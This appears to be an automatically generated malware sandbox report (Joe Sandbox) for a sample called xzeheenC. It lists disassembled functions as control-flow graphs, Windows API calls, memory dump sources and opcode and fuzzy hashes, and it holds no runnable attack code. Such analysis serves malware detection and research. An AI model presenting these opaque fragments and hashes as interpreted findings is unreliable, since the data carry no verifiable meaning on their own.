                                                                                                                        control_flow_graph 156 20a81bd0-20a81bd9 157 20a81bdb-20a81be0 156->157 158 20a81be2-20a81be5 156->158 159 20a81c1a-20a81c1d 157->159 160 20a81bee-20a81bf1 158->160 161 20a81be7-20a81bec 158->161 162 20a81bfa-20a81bfd 160->162 163 20a81bf3-20a81bf8 160->163 161->159 164 20a81bff-20a81c04 162->164 165 20a81c06-20a81c09 162->165 163->159 164->159 166 20a81c0b-20a81c10 165->166 167 20a81c12-20a81c15 165->167 166->159 168 20a81c1e-20a81c8e 167->168 169 20a81c17 167->169 176 20a81c93-20a81ca2 call 20a81b78 168->176 169->159 179 20a81ceb-20a81cee 176->179 180 20a81ca4-20a81cbf 176->180 181 20a81cf0-20a81cf6 179->181 182 20a81d04-20a81d33 179->182 180->179 193 20a81cc1-20a81cc5 180->193 181->176 184 20a81cf8 181->184 187 20a81d3f-20a81d45 182->187 188 20a81d35-20a81d38 182->188 185 20a81cfa-20a81d01 184->185 191 20a81d59-20a81d8d 187->191 192 20a81d47-20a81d4a 187->192 188->187 190 20a81d3a-20a81d3d 188->190 190->187 194 20a81d90-20a81de8 190->194 192->191 195 20a81d4c-20a81d4e 192->195 196 20a81cce-20a81cd7 193->196 197 20a81cc7-20a81ccc 193->197 202 20a81def-20a81e6f 194->202 195->191 198 20a81d50-20a81d53 195->198 196->179 199 20a81cd9-20a81ce2 196->199 197->185 198->191 198->202 199->179 203 20a81ce4-20a81ce9 199->203 221 20a81e8f-20a81ee5 202->221 222 20a81e71-20a81e75 202->222 203->185 228 20a81ef0-20a81ef9 221->228 229 20a81ee7-20a81eee 221->229 258 20a81e78 call 20a81f39 222->258 259 20a81e78 call 20a81f6d 222->259 260 20a81e78 call 20a81bd0 222->260 261 20a81e78 call 20a81c70 222->261 262 20a81e78 call 20a81bc1 222->262 223 20a81e7b-20a81e8c 231 20a81efb-20a81f02 228->231 232 20a81f04 228->232 230 20a81f0b-20a81f14 229->230 233 20a81fa8-20a81faf call 20a820b8 230->233 234 20a81f1a-20a81f37 230->234 231->230 232->230 236 20a81fb5-20a81fd1 233->236 234->236 239 20a81fd8-20a82032 236->239 240 20a81fd3-20a81fd6 236->240 241 20a8203a-20a82043 239->241 240->239 240->241 242 20a8204a-20a82080 241->242 243 20a82045-20a82048 241->243 245 20a820af-20a820b5 242->245 254 20a82082-20a820a7 242->254 243->242 243->245 254->245 258->223 259->223 260->223 261->223 262->223
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                                                                                        • API String ID: 0-1597716666
                                                                                                                        • Opcode ID: e2ed0d0424745823e72c32ac438b5b4484d9c80f32e9f9ea4e59d3b391b3a443
                                                                                                                        • Instruction ID: b257eed1a137397a6ad36eba635f66e2d92e6e3f4741be341c8d573605dfe5c1
                                                                                                                        • Opcode Fuzzy Hash: e2ed0d0424745823e72c32ac438b5b4484d9c80f32e9f9ea4e59d3b391b3a443
                                                                                                                        • Instruction Fuzzy Hash: 68D1E774B042048FC704DFA8D590AAE7BBAFF89320F644469D505DB3A2CB75ED46CBA1
                                                                                                                        Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3322701435-0
                                                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                        Function 20CAC888 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 277 20cac888-20cac927 GetCurrentProcess 281 20cac929-20cac92f 277->281 282 20cac930-20cac964 GetCurrentThread 277->282 281->282 283 20cac96d-20cac9a1 GetCurrentProcess 282->283 284 20cac966-20cac96c 282->284 285 20cac9aa-20cac9c5 call 20cace70 283->285 286 20cac9a3-20cac9a9 283->286 284->283 290 20cac9cb-20cac9fa GetCurrentThreadId 285->290 286->285 291 20cac9fc-20caca02 290->291 292 20caca03-20caca65 290->292 291->292
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC916
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 20CAC953
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC990
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 20CAC9E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: c68818f451b92212ad4996e61869785cebf14d92bcf1baada82a51f40a012ab9
                                                                                                                        • Instruction ID: 8e7cd390abe62b21e0fba9f7fb13365135caf6f5863c35b7e8d425764c38e0d4
                                                                                                                        • Opcode Fuzzy Hash: c68818f451b92212ad4996e61869785cebf14d92bcf1baada82a51f40a012ab9
                                                                                                                        • Instruction Fuzzy Hash: 0A5185B09003498FCB04DFA9D588BEEBBF5AF88310F248059E459A7260D7756980CF65
                                                                                                                        Function 20CAC898 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 299 20cac898-20cac927 GetCurrentProcess 303 20cac929-20cac92f 299->303 304 20cac930-20cac964 GetCurrentThread 299->304 303->304 305 20cac96d-20cac9a1 GetCurrentProcess 304->305 306 20cac966-20cac96c 304->306 307 20cac9aa-20cac9c5 call 20cace70 305->307 308 20cac9a3-20cac9a9 305->308 306->305 312 20cac9cb-20cac9fa GetCurrentThreadId 307->312 308->307 313 20cac9fc-20caca02 312->313 314 20caca03-20caca65 312->314 313->314
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC916
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 20CAC953
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC990
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 20CAC9E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: bcb42ad95be6dab9de03b0cfa721f966fb179a6f0e4b8c5da78c1738870b30f5
                                                                                                                        • Instruction ID: 6367e1d08eb220450240e734846fbf87be3f80c3579f4fa9d173bbfe8543c889
                                                                                                                        • Opcode Fuzzy Hash: bcb42ad95be6dab9de03b0cfa721f966fb179a6f0e4b8c5da78c1738870b30f5
                                                                                                                        • Instruction Fuzzy Hash: 7A5176B0900349CFDB04DFAAD588BAEBBF5EF88310F248019E059A7360D7756940CFA5
                                                                                                                        Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1411284514-0
                                                                                                                        • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                        • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                        • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                        • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                        Function 20A81638 Relevance: 5.2, Strings: 4, Instructions: 227COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 340 20a81638-20a8167f 344 20a8185b-20a81866 340->344 345 20a81685-20a81687 340->345 346 20a8186d-20a81878 344->346 345->346 347 20a8168d-20a81691 345->347 352 20a8187f-20a8188a 346->352 347->346 348 20a81697-20a816cf 347->348 348->352 361 20a816d5-20a816d9 348->361 356 20a81891-20a8189c 352->356 360 20a818a3-20a818cf 356->360 396 20a818d6-20a81902 360->396 362 20a816db-20a816df 361->362 363 20a816e5-20a816e9 361->363 362->356 362->363 364 20a816eb-20a816f2 363->364 365 20a816f4-20a816f8 363->365 367 20a81710-20a81714 364->367 365->367 368 20a816fa-20a816fe 365->368 371 20a8171b-20a81722 367->371 372 20a81716-20a81718 367->372 369 20a81709 368->369 370 20a81700-20a81707 368->370 369->367 370->367 374 20a8172b-20a8172f 371->374 375 20a81724 371->375 372->371 380 20a8180e-20a81811 374->380 381 20a81735-20a81739 374->381 375->374 376 20a81849-20a81854 375->376 377 20a817ad-20a817b0 375->377 378 20a8177e-20a81781 375->378 379 20a817e0-20a817e3 375->379 376->344 390 20a817bb-20a817de 377->390 391 20a817b2-20a817b5 377->391 385 20a8178c-20a817ab 378->385 386 20a81783-20a81786 378->386 383 20a817ea-20a81809 379->383 384 20a817e5 379->384 387 20a81821-20a81844 380->387 388 20a81813-20a81816 380->388 381->376 389 20a8173f-20a81742 381->389 411 20a81767-20a8176b 383->411 384->383 385->411 386->360 386->385 387->411 388->387 393 20a81818-20a8181b 388->393 394 20a81749-20a81765 389->394 395 20a81744 389->395 390->411 391->390 391->396 393->387 401 20a81909-20a81942 393->401 394->411 395->394 396->401 420 20a8176e call 20a81bd0 411->420 421 20a8176e call 20a81c70 411->421 422 20a8176e call 20a81bc1 411->422 414 20a81774-20a8177b 420->414 421->414 422->414
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $Haq$Haq$Haq
                                                                                                                        • API String ID: 0-432640594
                                                                                                                        • Opcode ID: 73735bcd55412fd1a8dc0b10ec8a35978cb854d44a6592c32b284fdb194c69a5
                                                                                                                        • Instruction ID: f1b905b9f7da6031b23b2bafb9b59ea2c2a09d16d290660142dfb5b3727f6f4f
                                                                                                                        • Opcode Fuzzy Hash: 73735bcd55412fd1a8dc0b10ec8a35978cb854d44a6592c32b284fdb194c69a5
                                                                                                                        • Instruction Fuzzy Hash: A6812834B002148FDB145FB8949826E3AABBF85370F60462DED629B3D1CF359D42CB92
                                                                                                                        Function 20AA4170 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LR]q$LR]q
                                                                                                                        • API String ID: 0-3917262905
                                                                                                                        • Opcode ID: 54654df09ccb37891838e44677c355c8b2823ece9b084128e2fd9ba9622e2860
                                                                                                                        • Instruction ID: 3fc983eced7fa59afb928e751f423b258fa02000ef98d10433dff635b3ccf3d5
                                                                                                                        • Opcode Fuzzy Hash: 54654df09ccb37891838e44677c355c8b2823ece9b084128e2fd9ba9622e2860
                                                                                                                        • Instruction Fuzzy Hash: DC81C235B101158FCB04DFB8C998A5E77F6BFC9604B518169E906DB3A1DB34EC02CBA1
                                                                                                                        Function 20AA3B52 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,aq$,aq
                                                                                                                        • API String ID: 0-2990736959
                                                                                                                        • Opcode ID: bfff7c1fb594d9ba2fa5b1bc22f113cc92979f5abe3f1b26deab7483a144fe79
                                                                                                                        • Instruction ID: fa99268d3ae409158915c8653b2eb80b4a131a0546477ebf222821ea0fb5c56c
                                                                                                                        • Opcode Fuzzy Hash: bfff7c1fb594d9ba2fa5b1bc22f113cc92979f5abe3f1b26deab7483a144fe79
                                                                                                                        • Instruction Fuzzy Hash: A681BF36A00205DFCB04CFB9C8C495ABBF6FF49214BA18569E505EB3A5D735EC45CBA0
                                                                                                                        Function 20AA4640 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: PH]q$PH]q
                                                                                                                        • API String ID: 0-1166926398
                                                                                                                        • Opcode ID: 2c64805492f0527f84fc3ef5e333f1d8bc331078bcd5b9eca338fdcdba387c1d
                                                                                                                        • Instruction ID: 84dfc2a36d99b65a3bc3a48b13aa96d5d887da9f41a6f1e0179a9e6bb0b6fc96
                                                                                                                        • Opcode Fuzzy Hash: 2c64805492f0527f84fc3ef5e333f1d8bc331078bcd5b9eca338fdcdba387c1d
                                                                                                                        • Instruction Fuzzy Hash: 24A17F74E01269CFDB68CF69D994B99B7B2BB89300F1081EAD90DA7351DB309E85CF11
                                                                                                                        Function 20AA3690 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq$Haq
                                                                                                                        • API String ID: 0-4016896955
                                                                                                                        • Opcode ID: 87b6069b8987e0c45f3bb1187194191e3601483a82203a5abc71ed1be227e723
                                                                                                                        • Instruction ID: 021c3bcab1893f437dd7b6ab1c79df0523ab3f69d0426df2117591b076b1adae
                                                                                                                        • Opcode Fuzzy Hash: 87b6069b8987e0c45f3bb1187194191e3601483a82203a5abc71ed1be227e723
                                                                                                                        • Instruction Fuzzy Hash: C351EEB67042659FDB018FA4D8C4BAA7BF6BF89310F508469F8458B292DB79DC01CB91
                                                                                                                        Function 20AA463D Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: PH]q$PH]q
                                                                                                                        • API String ID: 0-1166926398
                                                                                                                        • Opcode ID: cd5897735e2074159412ff8b0601ffbf180e333f9eade548f2a4df0b7e5e7e34
                                                                                                                        • Instruction ID: cce148ac5d6d1963980c06bcc4114f8a12e01124b24ec0287ef19b4c3fea33b3
                                                                                                                        • Opcode Fuzzy Hash: cd5897735e2074159412ff8b0601ffbf180e333f9eade548f2a4df0b7e5e7e34
                                                                                                                        • Instruction Fuzzy Hash: 56816075E01228CFDB68CF69C994B99B7B2BB89200F1081EAD94DA7351DB309E85CF11
                                                                                                                        Function 20A81F39 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8bq$TJbq
                                                                                                                        • API String ID: 0-3440557903
                                                                                                                        • Opcode ID: 84c10518d4de9aec011109e53fc39da3eaf32dbb0b27839f8048ee78bdd8c901
                                                                                                                        • Instruction ID: 66e1b713111a66aa0776503ad8fcc02ffd47f0fc9b5576faa5a484656947d9d5
                                                                                                                        • Opcode Fuzzy Hash: 84c10518d4de9aec011109e53fc39da3eaf32dbb0b27839f8048ee78bdd8c901
                                                                                                                        • Instruction Fuzzy Hash: 15312635B002098FCB45DFA8C580E9EBBB6FF88320F555454E501AB366CA71ED86CBA1
                                                                                                                        Function 20A81F6D Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8bq$TJbq
                                                                                                                        • API String ID: 0-3440557903
                                                                                                                        • Opcode ID: f03717c676ce8aeb9ee941c641c8b3058ab1110312800276da6881cf8eaeb508
                                                                                                                        • Instruction ID: b27e188e255d6546efe674e87ec6a986070628efb25d257587d2f8aa0f05f48b
                                                                                                                        • Opcode Fuzzy Hash: f03717c676ce8aeb9ee941c641c8b3058ab1110312800276da6881cf8eaeb508
                                                                                                                        • Instruction Fuzzy Hash: 6B313735B001098FCB45DFA8C590E9EBBB6FF88320F555454E501AB376CA71ED86CBA0
                                                                                                                        Function 20CA9D2C Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 20CA9EF9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        • Opcode ID: 866329b216b2c87a6c2a414079599d86b973da888f315851f9e08286bd8ebe99
                                                                                                                        • Instruction ID: 4d7881a8ccf2173d313dca32dde8de37ba5f932794b6746609ec18ca2f8c4d68
                                                                                                                        • Opcode Fuzzy Hash: 866329b216b2c87a6c2a414079599d86b973da888f315851f9e08286bd8ebe99
                                                                                                                        • Instruction Fuzzy Hash: 707179B4D00258DFDF20CFA9D984BDDBBF1BB0A304F1091AAE918A7211D774AA85CF55
                                                                                                                        Function 20CA9D38 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 20CA9EF9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        • Opcode ID: 32dc83a535821a8f62af169403b986578411f5e10d11194f2bda24a8142234c0
                                                                                                                        • Instruction ID: 4842f16413c49b1c4c637d90f04ca6e4d9b45f3cc773ec1fc7f6d9fcc3086b75
                                                                                                                        • Opcode Fuzzy Hash: 32dc83a535821a8f62af169403b986578411f5e10d11194f2bda24a8142234c0
                                                                                                                        • Instruction Fuzzy Hash: 8B717AB4D00258DFDF20CFA9D984BDDBBF1BB0A304F1091AAE918A7211D734AA85CF55
                                                                                                                        Function 1F6EAA30 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 1F6EAAC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3472370573.000000001F6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F6E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1f6e0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 6842923-0
                                                                                                                        • Opcode ID: 3d404b1030b37fe3512dd85577fdb206f760a1d2dde278a03d2428ca0168131b
                                                                                                                        • Instruction ID: 906670e06de89cf8870e3fe01cddb074a016e3ed59762582ff2e8eb5856776fc
                                                                                                                        • Opcode Fuzzy Hash: 3d404b1030b37fe3512dd85577fdb206f760a1d2dde278a03d2428ca0168131b
                                                                                                                        • Instruction Fuzzy Hash: 0451BE770256769FC3406F34A3EC22EBA75FB2F3A3B40AD40E42EC145ADB344049CA21
                                                                                                                        Function 20CACEE1 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20CACFB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: d4219f7c1ec723c1f005fd07d7762bab1afa123c8d3c427c2283570a356707cf
                                                                                                                        • Instruction ID: 7a60f0938e2ac230f6a880586ae9462d810e0d84ac3a70972ea94f8122c26a07
                                                                                                                        • Opcode Fuzzy Hash: d4219f7c1ec723c1f005fd07d7762bab1afa123c8d3c427c2283570a356707cf
                                                                                                                        • Instruction Fuzzy Hash: 274176B9D002599FCF10CFA9D984ADEBBF5BB19310F14906AE918AB310D335A985CF94
                                                                                                                        Function 20CACEE8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20CACFB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: c2348661f2c7b8e9ca007a06a24bbcfa0e1461ca1f1192ed083973bcdf054051
                                                                                                                        • Instruction ID: 0fe523009442ce4d8924201594d58533a4cff44c90d4182a554abf58450c0b58
                                                                                                                        • Opcode Fuzzy Hash: c2348661f2c7b8e9ca007a06a24bbcfa0e1461ca1f1192ed083973bcdf054051
                                                                                                                        • Instruction Fuzzy Hash: 934146B9D002599FCF10CFA9D984ADEBBF5BB09310F14906AE918AB310D335A945CF94
                                                                                                                        Function 20CACB7C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 20CADE51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714655100-0
                                                                                                                        • Opcode ID: d11c0b940e089d1e5bc34e569f80c89bc29752222b46b16faee847d97d366bf5
                                                                                                                        • Instruction ID: 0c3fe088d719e1081084a3f9d48a82d1d4b97b65f4696da5b106e7c80847a85a
                                                                                                                        • Opcode Fuzzy Hash: d11c0b940e089d1e5bc34e569f80c89bc29752222b46b16faee847d97d366bf5
                                                                                                                        • Instruction Fuzzy Hash: 224109B4900205CFCB14CF99C488A9ABBF5FF99310F24C459E519AB361D775A841CBA0
